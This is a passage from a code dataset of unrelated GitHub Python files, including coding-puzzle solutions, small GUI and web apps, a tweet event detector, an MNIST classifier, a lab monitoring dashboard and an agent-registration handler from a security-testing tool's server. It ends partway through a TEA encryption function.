MultinomialNB\nfrom nltk.classify.scikitlearn import SklearnClassifier\nimport random\nfrom modules import tabulate\nfrom FeatureSelector import FeatureSelector\nfrom operator import itemgetter\n\nclass EventDetective:\n\n def __init__(self):\n self.dataSets = os.listdir('data/')\n self.candidates = {}\n self._loadDataSet()\n featureSelector = FeatureSelector(self.candidates)\n #self.featuresCat = []\n #self.featuresBi = []\n self.events = []\n \n # detecteer events\n for h in self.candidates:\n for t in self.candidates[h]:\n candidate = self.candidates[h][t] \n \n featuresCat = featureSelector.getFeatures(candidate, ['wordFeatures'])\n featureSelector.addCategoryClassifier(self.classifierCat)\n label = self.classifierCat.classify(featuresCat)\n\n featuresBi = featureSelector.getFeatures(candidate,['category', 'location','wordOverlapSimple','wordOverlapUser'])\n classifierBiLabel = self.classifierBi.classify(featuresBi)\n if classifierBiLabel != \"geen_event\":\n self.events.append((candidate,classifierBiLabel)) \n \n def _loadDataSet(self):\n for i, dataset in enumerate(self.dataSets):\n print(\"{}: {}\".format(i, dataset))\n choice = int(input(\"Select a dataset with classifiers: \"))\n \n with open(\"data/\" + self.dataSets[choice] + \"/categoryClassifier.bin\", 'rb') as binFile:\n self.classifierCat = pickle.load(binFile)\n\n with open(\"data/\" + self.dataSets[choice] + \"/eventClassifier.bin\", 'rb') as binFile:\n self.classifierBi = pickle.load(binFile)\n \n choice = int(input(\"Select a dataset with event candidates that need event detection: \"))\n\n with open(\"data/\" + self.dataSets[choice] + \"/eventCandidates.json\") as jsonFile:\n self.candidates = json.load(jsonFile)\n \n def generateMarkers(self):\n print(\"Creating Google Maps markers & add WIKI links...\")\n \n js = open('vis/map/js/markers.js','w')\n js.write('var locations = [')\n\n \n for tweets,label in self.events:\n writableCluster = ''\n gh = []\n i = 0\n avgLon = 0\n avgLat = 0\n #tweets = sorted(tweets, key=itemgetter('unixTime'));\n \n for tweet in tweets:\n i = i + 1\n gh.append(tweet['geoHash'])\n avgLon += float(tweet[\"lon\"])\n avgLat += float(tweet[\"lat\"])\n # backslashes voor multiline strings in Javascript\n writableCluster += \"{} {} {} {}

\".format(tweet['localTime'], tweet['geoHash'], tweet['user'], tweet['text']).replace(\"'\", \"\\\\'\")\n # Bepaal het Cartesiaans (normale) gemiddelde van de coordinaten, de afwijking (door vorm\n # van de aarde) zal waarschijnlijk niet groot zijn omdat het gaat om een klein vlak op aarde...\n # Oftewel, we doen even alsof de aarde plat is ;-)\n avgLon /= i\n avgLat /= i\n #writableCluster += \"
\" + str(ngrams).replace(\"'\", \"\\\\'\")\n js.write(\"['{}', {}, {}, '{}'],\".format(writableCluster,avgLat,avgLon,label))\n js.write('];')\n js.close()\n \n# DEMO\nif __name__ == \"__main__\":\n detective = EventDetective()\n detective.generateMarkers()","repo_name":"daviddekleer/EventDetective","sub_path":"EventDetective.py","file_name":"EventDetective.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18405585649","text":"from itertools import accumulate; from math import floor,ceil,sqrt; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce,cache; from heapq import *; import unittest; from typing import List,Optional; from functools import cache; from operator import lt, gt\nfrom binary_tree_tester import ser,des; from a_linked_list import make_linked_list\ndef get_sol(): return Solution()\n# https://www.youtube.com/watch?v=4wNXkhAky3s&t=1164s\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n BUY,SELL=0,1\n @cache\n def recur(i,state):\n if i>=n: return 0\n if state==BUY:\n option1=prices[i]+recur(i+2,SELL)\n option2=recur(i+1,BUY)\n else:\n option1=-prices[i]+recur(i+1,BUY)\n option2=recur(i+1,SELL)\n return max(option1,option2)\n\n n=len(prices)\n return recur(0,SELL)\nclass Solution3:\n def maxProfit(self, prices):\n if not prices:\n return 0\n n = len(prices)\n in_hand,no_stock,cooldown = 1,0,-1\n dp = {}\n def f(i, state):\n if i == n: return 0\n if (i, state) in dp: return dp[(i, state)]\n if state == cooldown: # after cooldown go to no_stock state\n dp[(i, state)] = f(i + 1, no_stock)\n if state == no_stock:\n dp[(i, state)] = max(f(i + 1, no_stock), f(i + 1, in_hand) - prices[i])\n if state == in_hand:\n dp[(i, state)] = max(prices[i] + f(i + 1, cooldown), f(i + 1, in_hand))\n return dp[(i, state)]\n return f(0,0)\n\nclass Solution2:\n def maxProfit(self, prices: List[int]) -> int:\n n=len(prices)\n no_stock,in_hand,sold =[0]*n,[0]*n,[0]*n\n in_hand[0]=0-prices[0]\n for i in range(1,n):\n no_stock[i]=max(no_stock[i-1],sold[i-1])\n in_hand[i]=max(in_hand[i-1],no_stock[i-1]-prices[i])\n sold[i]=in_hand[i-1]+prices[i]\n return max(no_stock[-1],in_hand[-1],sold[-1])\n\nclass Tester(unittest.TestCase):\n def test01(self):\n self.assertEqual(3,get_sol().maxProfit([1,2,3,0,2]))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc309.py","file_name":"lc309.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30477003598","text":"import PySimpleGUI as sg\n\nnumberOf = 1\n\nstudent_name = 'Mike Dong'\nmark = [[],\n []]\n\ncolumn = [[sg.Button('Add', size=(23,2))]]\n\n\n#column.remove([sg.Button('Add', size=(23,2))])\ndel column[len(column)-1]\n\nfor x in range(numberOf):\n column.append([sg.Text('Expectation ', text_color = 'black', justification = 'left'), sg.InputText(' ', size= (10, 1))],)\n column.append([sg.Text('Mark ', text_color = 'black', justification = 'left'), sg.InputText(' ', size= (10, 1))],)\n column.append([sg.Text(' ', justification = 'right'), sg.Checkbox(' ')],)\n column.append([sg.Text('_' * 100, size=(23, 1))],)\n column.append([sg.Button('Add', size=(23,2), bind_return_key = True)],)\n\n\nlayout = [[sg.Text('Mark entry - ' + student_name, size=(21, 1), font=(\"Helvetica\", 15), justification = 'center')],\n[sg.Radio('Test ', 'RADIO1', default=True, text_color = 'red'), sg.Radio('Assignment ', 'RADIO1', text_color = 'blue')],\n[sg.Radio('Presentation ', 'RADIO1', text_color = 'green'), sg.Radio('Quiz ', 'RADIO1', text_color = 'Yellow'), sg.Checkbox(' ')],\n[sg.Column(column,scrollable=True, size=(225,150))]]\n\n#event, values = sg.Window('Mark ', auto_size_text=True, default_element_size=(40, 1)).Layout(layout).Read()\nwindow = sg.FlexForm('Mark ', auto_size_text=True, default_element_size=(40, 1)).Layout(layout)\n\nwhile True:\n event, values = window.Read()\n if event is None:\n break\n","repo_name":"sidbmw/GRADESK","sub_path":"Python/practice2.py","file_name":"practice2.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"19735494661","text":"class solve:\n def __init__(self):\n x,y=map(int,input().split())\n p=x*x+y*y\n r=int(p**0.5)\n if r*r

p and (r%2 and x*y>0 or r%2==0 and x*y<0):\n print(\"white\")\n else:\n print(\"black\")\n \nobj=solve()","repo_name":"bhavikjain403/CodeForces","sub_path":"40A.py","file_name":"40A.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36381838911","text":"# coding=utf-8\nfrom __future__ import absolute_import\nfrom django import template\nfrom django.conf import settings\n\n\nregister = template.Library()\n\n\n@register.filter\ndef get_avatar(user):\n try:\n return user.avatar.url\n except ValueError:\n return '%susers/img/empty_avatar.png' % settings.STATIC_URL\n","repo_name":"python-coach/microsocial","sub_path":"users/templatetags/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3288272623","text":"from turtle import Screen\nimport random\nimport time\nfrom car import Car\nfrom tartaruga import Tartaruga\n\nPLAYING = True\ncars = []\n\n#create the screen\nscreen = Screen()\nscreen.title(\"Turtle crossing\")\nscreen.screensize(600, 600)\nscreen.tracer(0)\nscreen.listen()\n\n#create the turtle\ntarta = Tartaruga()\ntarta.setpos(0, -300)\ntarta.setheading(90)\n\n#event handler to move the turtle\nscreen.onkey(tarta.move_up, \"Up\")\nscreen.onkey(tarta.move_down, \"Down\")\n\n#create the car(s)\ncar = Car()\nfor i in range(10):\n car = Car()\n cars.append(car)\n\n#main loop\nwhile PLAYING:\n time.sleep(0.04)\n screen.update()\n screen.tracer(0)\n for car in cars:\n car.move()\n type(cars)\n\n\n\n\nscreen.exitonclick()\n\n","repo_name":"almolinagithub/turtle_crossing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40542792692","text":"from contextlib import suppress\nfrom datetime import datetime\nfrom ipaddress import IPv4Interface\nfrom typing import Callable, List, Optional\n\nfrom common import AgentRegistrationData\nfrom common.types import SocketAddress\nfrom monkey_island.cc.models import Agent, CommunicationType, Machine\nfrom monkey_island.cc.repositories import (\n IAgentRepository,\n IMachineRepository,\n INodeRepository,\n UnknownRecordError,\n)\n\n\nclass handle_agent_registration:\n \"\"\"\n Update repositories when a new agent registers\n \"\"\"\n\n def __init__(\n self,\n machine_repository: IMachineRepository,\n agent_repository: IAgentRepository,\n node_repository: INodeRepository,\n get_current_datetime: Callable[[], datetime] = datetime.now,\n ):\n self._machine_repository = machine_repository\n self._agent_repository = agent_repository\n self._node_repository = node_repository\n self._get_current_datetime = get_current_datetime\n\n def __call__(self, agent_registration_data: AgentRegistrationData):\n machine = self._update_machine_repository(agent_registration_data)\n self._add_agent(agent_registration_data, machine)\n self._add_node_communication(agent_registration_data, machine)\n\n def _update_machine_repository(self, agent_registration_data: AgentRegistrationData) -> Machine:\n machine = self._find_existing_machine_to_update(agent_registration_data)\n\n if machine is None:\n machine = Machine(id=self._machine_repository.get_new_id())\n\n self._upsert_machine(machine, agent_registration_data)\n\n return machine\n\n def _find_existing_machine_to_update(\n self, agent_registration_data: AgentRegistrationData\n ) -> Optional[Machine]:\n with suppress(UnknownRecordError):\n return self._machine_repository.get_machine_by_hardware_id(\n agent_registration_data.machine_hardware_id\n )\n\n for network_interface in agent_registration_data.network_interfaces:\n with suppress(UnknownRecordError):\n # NOTE: For now, assume IPs are unique. In reality, two machines could share the\n # same IP if there's a router between them.\n return self._machine_repository.get_machines_by_ip(network_interface.ip)[0]\n\n return None\n\n def _upsert_machine(self, machine: Machine, agent_registration_data: AgentRegistrationData):\n self._update_hardware_id(machine, agent_registration_data)\n self._update_network_interfaces(machine, agent_registration_data)\n\n self._machine_repository.upsert_machine(machine)\n\n def _update_hardware_id(self, machine: Machine, agent_registration_data: AgentRegistrationData):\n if (\n machine.hardware_id is not None\n and machine.hardware_id != agent_registration_data.machine_hardware_id\n ):\n raise Exception(\n f\"Hardware ID mismatch:\\n\\tMachine: {machine}\\n\\t\"\n f\"AgentRegistrationData: {agent_registration_data}\"\n )\n\n machine.hardware_id = agent_registration_data.machine_hardware_id\n\n def _update_network_interfaces(\n self, machine: Machine, agent_registration_data: AgentRegistrationData\n ):\n updated_network_interfaces: List[IPv4Interface] = []\n agent_registration_data_ips = set(\n map(lambda iface: iface.ip, agent_registration_data.network_interfaces)\n )\n\n # Prefer interfaces provided by the AgentRegistrationData to those in the Machine record.\n # The AgentRegistrationData was collected while running on the machine, whereas the Machine\n # data may have only been collected from a scan. For example, the Machine and\n # AgentRedistrationData may have the same IP with a different subnet mask.\n for interface in machine.network_interfaces:\n if interface.ip not in agent_registration_data_ips:\n updated_network_interfaces.append(interface)\n\n updated_network_interfaces.extend(agent_registration_data.network_interfaces)\n\n machine.network_interfaces = sorted(updated_network_interfaces)\n\n def _add_agent(self, agent_registration_data: AgentRegistrationData, machine: Machine):\n new_agent = Agent(\n id=agent_registration_data.id,\n machine_id=machine.id,\n registration_time=self._get_current_datetime(),\n start_time=agent_registration_data.start_time,\n parent_id=agent_registration_data.parent_id,\n cc_server=agent_registration_data.cc_server,\n sha256=agent_registration_data.sha256,\n )\n self._agent_repository.upsert_agent(new_agent)\n\n def _add_node_communication(\n self, agent_registration_data: AgentRegistrationData, src_machine: Machine\n ):\n dst_machine = self._get_or_create_cc_machine(agent_registration_data.cc_server)\n\n self._node_repository.upsert_communication(\n src_machine.id, dst_machine.id, CommunicationType.CC\n )\n\n def _get_or_create_cc_machine(self, cc_server: SocketAddress) -> Machine:\n dst_ip = cc_server.ip\n\n try:\n return self._machine_repository.get_machines_by_ip(dst_ip)[0]\n except UnknownRecordError:\n new_machine = Machine(\n id=self._machine_repository.get_new_id(), network_interfaces=[IPv4Interface(dst_ip)]\n )\n self._machine_repository.upsert_machine(new_machine)\n\n return new_machine\n","repo_name":"guardicore/monkey","sub_path":"monkey/monkey_island/cc/island_event_handlers/handle_agent_registration.py","file_name":"handle_agent_registration.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":6367,"dataset":"github-code","pt":"21"} +{"seq_id":"5410722971","text":"\n'''\n6-11.转换。\n(a)创建一个从整型到IP地址的转换程序,如下格式;WWW.XXX.YYY.ZZZ。\n(b)更新你的程序,使之可以逆转换。\n'''\n\ndef num2ip(num):\n num = int(num)\n if num < 0 or num >= pow(2, 32):\n raise ValueError('input number is invalid')\n base = 0b11111111\n f = lambda i: '{:}'.format(i)\n ip = []\n for i in range(4):\n ip.insert(0, f(num & base))\n num = num >> 8\n return '.'.join(ip)\n\ndef ip2num(ip):\n ip = str(ip)\n ns = [int(i) for i in ip.split(r'.')]\n num = 0\n for i in range(4):\n num = (num << 8) + ns[i]\n return num\n\ndef main():\n ips = ['192.168.1.2', '0.184.244.124', '1.98.52.157', \n '1.238.190.8', '0.52.95.231', '140.82.109.216']\n for ip in ips:\n print('IP: {:15} number: {:15}'.format(ip, ip2num(ip)))\n \n nums = [3232235778, 12121212, 23213213, 32423432, 3432423, 2354212312]\n for num in nums:\n print('IP: {:15} number: {:15}'.format(num2ip(num), num))\n\nif __name__ == '__main__':\n main()","repo_name":"Zjianglin/Python_programming_demo","sub_path":"chapter6/6-11.py","file_name":"6-11.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9437257540","text":"import pickle\nimport flask\nimport dash\nfrom dash.dependencies import Output, Event, Input\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly\nimport random\nimport plotly.graph_objs as go\nfrom collections import deque\nimport bridge_controller as bc\nimport machine_learning as ml\nimport numpy as np\n\nX_temp = deque(maxlen=20)\nX_temp.append(1)\nY_temp = deque(maxlen=20)\n\nX_pres = deque(maxlen=20)\nX_pres.append(1)\nY_pres = deque(maxlen=20)\n\nX_humi = deque(maxlen=20)\nX_humi.append(1)\nY_humi = deque(maxlen=20)\n\nX_conc = deque(maxlen=20)\nX_conc.append(1)\nY_conc = deque(maxlen=20)\n\napp = dash.Dash(__name__, processes=4)\n\ndef get_stats(X):\n min = str(round(np.min(X), 2))\n max = str(round(np.max(X), 2))\n std = str(round(np.std(X), 2))\n avg = str(round(np.mean(X), 2))\n med = str(round(np.median(X), 2))\n return min, max, std, avg, med\n\napp.layout = html.Div(\n [\n html.Div([\n html.Img(src=\"https://i.imgur.com/ihOBYtR.png\",style={\"display\":\"block\",\"width\":125,\"margin\":\"auto auto\"}),\n html.H2('Particle Accelerator Observation Tool',style={\"display\":\"inline-block\"}),\n html.Div([\n html.Button('Enable Laser 1', id='button',style={\"border\":\"2px solid #1589FF\",\"width\":100,\"margin\":5,\"height\":75,\"background\":\"none\"}),\n html.Button('Enable Laser 2', id='button2',style={\"border\":\"2px solid #1589FF\",\"width\":100,\"margin\":5,\"height\":75,\"background\":\"none\"}),\n html.Button('Switch to PIXE', id='button3',style={\"border\":\"2px solid #1589FF\",\"width\":100,\"margin\":5,\"height\":75,\"background\":\"none\"}),\n html.Button('Switch to Irad', id='button4',style={\"border\":\"2px solid #1589FF\",\"width\":100,\"margin\":5,\"height\":75,\"background\":\"none\"})\n ])\n ],style={\"border-right\":\"2px solid blue\"}),\n html.Div([\n html.Div([\n #html.Button([\n html.Img(id=\"cam\",src=\"http://192.168.162.254:10000/cgi-bin/video.cgi?msubmenu=mjpg\",width=\"500\",height=\"400\", style={\"display\":\"block\",\"margin-top\":\"20px\"}),\n #],id=\"cam\"),\n html.Img(id=\"usbcam\",src=\"http://127.0.0.1:8081\",width=\"500\",height=\"400\",style={'margin-top':50})\n ]),\n html.Div([\n html.Div([\n html.P('Stats here', id='live-graph-stats'),\n dcc.Graph(id='live-graph',style={\"width\":600,\"height\":400},config={'displayModeBar':False}),\n html.P('Stats here', id='live-graph-stats2'),\n dcc.Graph(id='live-graph2',style={\"width\":600,\"height\":400},config={'displayModeBar':False})\n ]),\n html.Div([\n html.P('Stats here', id='live-graph-stats3'),\n dcc.Graph(id='live-graph3',style={\"width\":600,\"height\":400},config={'displayModeBar':False}),\n html.P('Stats here', id='live-graph-stats4'),\n dcc.Graph(id='live-graph4',style={\"width\":600,\"height\":400},config={'displayModeBar':False})\n ]),\n dcc.Interval(\n id='graph-update',\n interval=2*1000\n ),\n\n ],style={\"display\":\"grid\",\"grid-template-columns\":\"50% 50%\"}),\n html.P('Composition here', id='spectrum-stats'),\n dcc.Graph(id='spectrum-graph',style={\"width\":1500,\"height\":400},config={'displayModeBar':False}),\n ],style={\"padding\":20,\"display\":\"grid\",\"grid-template-columns\":\"auto auto\"}),\n\n ],style={\"display\":\"grid\",\"grid-template-columns\":\"275px auto\"})\napp.css.append_css({\"external_url\": \"https://codepen.io/sturzamihai/pen/LJWmQL.css\"})\n@app.callback(Output('spectrum-graph', 'figure'),\n events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n print('SPECTRUM')\n spectrum, pred = ml.analyze('../Silicone Drift Detector/SpectrumData.mca')\n #spectrum, pred = ml.analyze('./Data/611_Magnet.mca')\n data = plotly.graph_objs.Scatter(\n x=list(range(4096)),\n y=spectrum,\n name='Scatter',\n mode= 'lines+markers'\n )\n\n return {'data': [data]}\n\n@app.callback(\n Output('spectrum-stats', 'children'),\n events=[Event('graph-update', 'interval')])\ndef display_stats():\n spectrum, pred = ml.analyze('../Silicone Drift Detector/SpectrumData.mca')\n pred = [str(x) for x in pred[0]]\n print(pred)\n stats_string = 'Composition: '+ \\\n 'SiO2: '+pred[0]+' Na2O: '+pred[1]+' CaO: '+pred[2]+' Al2O3: '+pred[3]\n print(stats_string)\n return stats_string\n\n@app.callback(Output('cam','children'), [Input('cam', 'n_clicks')])\ndef on_click(bclick):\n print(bclick)\n\n@app.callback(Output('live-graph', 'figure'),\n events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n response = bc.analog_read_pin('rtua', 0)\n X_temp.append(X_temp[-1]+1)\n Y_temp.append(response)\n data = plotly.graph_objs.Scatter(\n x=list(X_temp),\n y=list(Y_temp),\n name='Scatter',\n mode= 'lines+markers'\n )\n\n return {'data': [data]}\n\n@app.callback(\n Output('live-graph-stats', 'children'),\n events=[Event('graph-update', 'interval')])\ndef display_stats():\n stats = get_stats(Y_temp)\n stats_string = 'Stats for last 20 samples:\\n'+ \\\n 'min: '+stats[0]+'\\nmax: '+stats[1]+'\\nstd: '+stats[2]+'\\navg: '+stats[3]+'\\nmed: '+stats[4]\n print(stats_string)\n return stats_string\n\n\n@app.callback(Output('live-graph2', 'figure'),\n events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n response = bc.analog_read_pin('rtua', 1)\n X_pres.append(X_pres[-1]+1)\n Y_pres.append(response)\n data = plotly.graph_objs.Scatter(\n x=list(X_pres),\n y=list(Y_pres),\n name='Scatter',\n mode= 'lines+markers'\n )\n\n return {'data': [data]}\n\n@app.callback(\n Output('live-graph-stats2', 'children'),\n events=[Event('graph-update', 'interval')])\ndef display_stats():\n stats = get_stats(Y_pres)\n stats_string = 'Stats for last 20 samples:\\n'+ \\\n 'min: '+stats[0]+'\\nmax: '+stats[1]+'\\nstd: '+stats[2]+'\\navg: '+stats[3]+'\\nmed: '+stats[4]\n print(stats_string)\n return stats_string\n\n@app.callback(Output('live-graph3', 'figure'),\n events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n response = bc.analog_read_pin('rtub', 0)\n X_humi.append(X_humi[-1]+1)\n Y_humi.append(response)\n data = plotly.graph_objs.Scatter(\n x=list(X_humi),\n y=list(Y_humi),\n name='Scatter',\n mode= 'lines+markers'\n )\n\n return {'data': [data]}\n\n@app.callback(\n Output('live-graph-stats3', 'children'),\n events=[Event('graph-update', 'interval')])\ndef display_stats():\n stats = get_stats(Y_humi)\n stats_string = 'Stats for last 20 samples:\\n'+ \\\n 'min: '+stats[0]+'\\nmax: '+stats[1]+'\\nstd: '+stats[2]+'\\navg: '+stats[3]+'\\nmed: '+stats[4]\n print(stats_string)\n return stats_string\n\n@app.callback(Output('live-graph4', 'figure'),\n events=[Event('graph-update', 'interval')])\ndef update_graph_scatter():\n response = bc.analog_read_pin('rtub', 1)\n X_conc.append(X_conc[-1]+1)\n Y_conc.append(response)\n data = plotly.graph_objs.Scatter(\n x=list(X_conc),\n y=list(Y_conc),\n name='Scatter',\n mode= 'lines+markers'\n )\n\n return {'data': [data]}\n\n@app.callback(\n Output('live-graph-stats4', 'children'),\n events=[Event('graph-update', 'interval')])\ndef display_stats():\n stats = get_stats(Y_conc)\n stats_string = 'Stats for last 20 samples:\\n'+ \\\n 'min: '+stats[0]+'\\nmax: '+stats[1]+'\\nstd: '+stats[2]+'\\navg: '+stats[3]+'\\nmed: '+stats[4]\n print(stats_string)\n return stats_string\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"paulbricman/parrot","sub_path":"Server/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":7992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42376522654","text":"from flask_login import login_user\nfrom tests.factories import UserFactory\nfrom PEC.settings.forms import AccountDetailForm\n\n\nclass TestAccountDetailForm:\n\n def test_valid(self, user):\n login_user(user)\n form = AccountDetailForm()\n form.first_name.data = 'Other'\n form.last_name.data = 'Name'\n form.email.data = user.email\n assert form.validate() is True\n\n def test_duplicate_email(self, user):\n login_user(user)\n user2 = UserFactory()\n form = AccountDetailForm()\n form.first_name.data = 'Other'\n form.last_name.data = 'Name'\n form.email.data = user2.email\n assert form.validate() is False\n","repo_name":"UgiR/UIC-PEC","sub_path":"tests/test_settings/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21070501399","text":"from image_test.nn.neuralnetwork import NeuralNetwork\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nprint(\"[INFO] loading MNIST (sample) dataset...\")\ndigits = datasets.load_digits()\ndata = digits.data.astype(\"float\")\n# 归一化\ndata = (data - data.min()) / (data.max() - data.min())\nprint(\"[INFO] samples: {}, dim: {}\".format(data.shape[0], data.shape[1]))\n\ntrainX, testX, trainY, testY = train_test_split(data, digits.target, test_size=0.25)\n\ntrainY = LabelBinarizer().fit_transform(trainY)\ntestY = LabelBinarizer().fit_transform(testY)\n\nprint(\"[INFO] training network...\")\nnn = NeuralNetwork([trainX.shape[1], 32, 16, 10])\nprint(\"[INFO] {}\".format(nn))\nnn.fit(trainX, trainY, epochs=1000)\n\nprint(\"[INFO] evaluating network...\")\npredictions = nn.predict(testX)\npredictions = predictions.argmax(axis=1)\nprint(classification_report(testY.argmax(axis=1), predictions))\n\n\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(nn.epoch, nn.loss)\nplt.title(\"Training loss\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss\")\nplt.show()\n","repo_name":"lmlzk/Deeplearning_test","sub_path":"image_test/nn_mnist.py","file_name":"nn_mnist.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2974822894","text":"from fileinput import filename\r\nimport os\r\nimport urllib.request\r\nfrom flask import Flask, flash, request, redirect, url_for, render_template\r\nfrom werkzeug.utils import secure_filename\r\nimport keras\r\nfrom keras.models import load_model\r\n#from tensorflow import keras\r\nfrom PIL import Image, ImageOps\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\n\r\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\r\nUPLOAD_FOLDER = r'D:\\kishan-know-backend\\static\\uploads'\r\nfilename=''\r\n\r\napp = Flask(__name__)\r\napp.secret_key = \"secret key\"\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\napp.config['MAX_CONTENT_LENGTH'] = 400 * 400 * 400\r\n\r\n\r\ndef allowed_file(filename):\r\n\treturn '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\t\r\n@app.route('/')\r\ndef upload_form():\r\n\treturn render_template('upload.html')\r\n\r\n@app.route('/', methods=['POST'])\r\ndef upload_image():\r\n\tif 'file' not in request.files:\r\n\t\tflash('No file part')\r\n\t\treturn redirect(request.url)\r\n\tfile = request.files['file']\r\n\tif file.filename == '':\r\n\t\tflash('No image selected for uploading')\r\n\t\treturn redirect(request.url)\r\n\tif file and allowed_file(file.filename):\r\n\t\tfilename = secure_filename(file.filename)\r\n\t\tnew_name = os.path.join(app.config['UPLOAD_FOLDER'], filename)\r\n\t\tprint(type(new_name))\r\n\t\tfile.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\r\n\t\t#print('upload_image filename: ' + filename)\r\n\t\tflash('Image successfully uploaded and displayed below')\r\n\r\n\r\n\r\n\t\tmodel = keras.models.load_model(r'keras_model.h5')\r\n\t\tdata = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\r\n\t\t# Replace this with the path to your image\r\n\t\t#str_path= image_path\r\n\t\timage = Image.open(new_name)\r\n\t\t#resize the image to a 224x224 with the same strategy as in TM2:\r\n\t\t#resizing the image to be at least 224x224 and then cropping from the center\r\n\t\tsize = (224, 224)\r\n\t\timage = ImageOps.fit(image, size, Image.ANTIALIAS)\r\n\t\t#turn the image into a numpy array\r\n\t\timage_array = np.asarray(image)\r\n\t\t# Normalize the image\r\n\t\tnormalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\r\n\t\t# Load the image into the array\r\n\t\tdata[0] = normalized_image_array\r\n\r\n\t\t# run the inference\r\n\t\tprediction = model.predict(data)\r\n\t\tif prediction[0][1] > prediction[0][0]:\r\n\t\t\tflash('It is infected')\r\n\t\telse:\r\n\t\t\tflash('It is safe')\r\n\t\tprint(type(prediction))\r\n\r\n\r\n\t\treturn render_template('upload.html', filename=filename)\r\n\telse:\r\n\t\tflash('Allowed image types are -> png, jpg, jpeg, gif')\r\n\t\treturn redirect(request.url)\r\n\r\n@app.route('/display/')\r\ndef display_image(filename):\r\n return redirect(url_for('static', filename='uploads/' + filename), code=301)\r\n\r\n'''\r\nmodel = keras.models.load_model(r'keras_model.h5')\r\ndata = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\r\n# Replace this with the path to your image\r\n#str_path= image_path\r\nimage = Image.open(filename)\r\n#resize the image to a 224x224 with the same strategy as in TM2:\r\n#resizing the image to be at least 224x224 and then cropping from the center\r\nsize = (224, 224)\r\nimage = ImageOps.fit(image, size, Image.ANTIALIAS)\r\n#turn the image into a numpy array\r\nimage_array = np.asarray(image)\r\n# Normalize the image\r\nnormalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\r\n# Load the image into the array\r\ndata[0] = normalized_image_array\r\n\r\n# run the inference\r\nprediction = model.predict(data)\r\nprint(prediction)\r\nprint(type(prediction))\r\n'''\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","repo_name":"arch-cl0wn/kishan-know-backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36064704055","text":"from __future__ import print_function\n\nimport sys\nimport time\nimport subprocess\nimport multiprocessing as mp\n\nfrom threading import Thread\n\nCOUNT = 100000000\n\n\ndef countdown(n):\n \"\"\" I am just a quick CPU bound method\"\"\"\n while n > 0:\n n -= 1\n return\n\n\ndef main(thread_count):\n start = time.time()\n # create CPU - 1 processes to spin CPU uselessly\n processes = [subprocess.Popen(['python2.7', 'spin.py'])\n for i in range(mp.cpu_count() - 1)]\n # create new threads and spawn it here\n for i in range(thread_count):\n t = Thread(target=countdown, args=(COUNT / thread_count,))\n t.start()\n # wait for all the threads to finish\n for i in range(thread_count):\n t.join()\n\n for p in processes:\n p.terminate()\n end = time.time()\n print('Time:', end - start)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print(\"USAGE :: %s \" % (__file__))\n sys.exit(0)\n main(int(sys.argv[1]))\n","repo_name":"piyusql/juggler","sub_path":"GIL/before_talk/mtspin.py","file_name":"mtspin.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18503412871","text":"from ctypes import *\nfrom typing import List\nfrom .Constance import magic_number_delta as delta\n\n\ndef encrypt(v, k: List[int], run_round: int = 32):\n v0 = c_uint32(v[0])\n v1 = 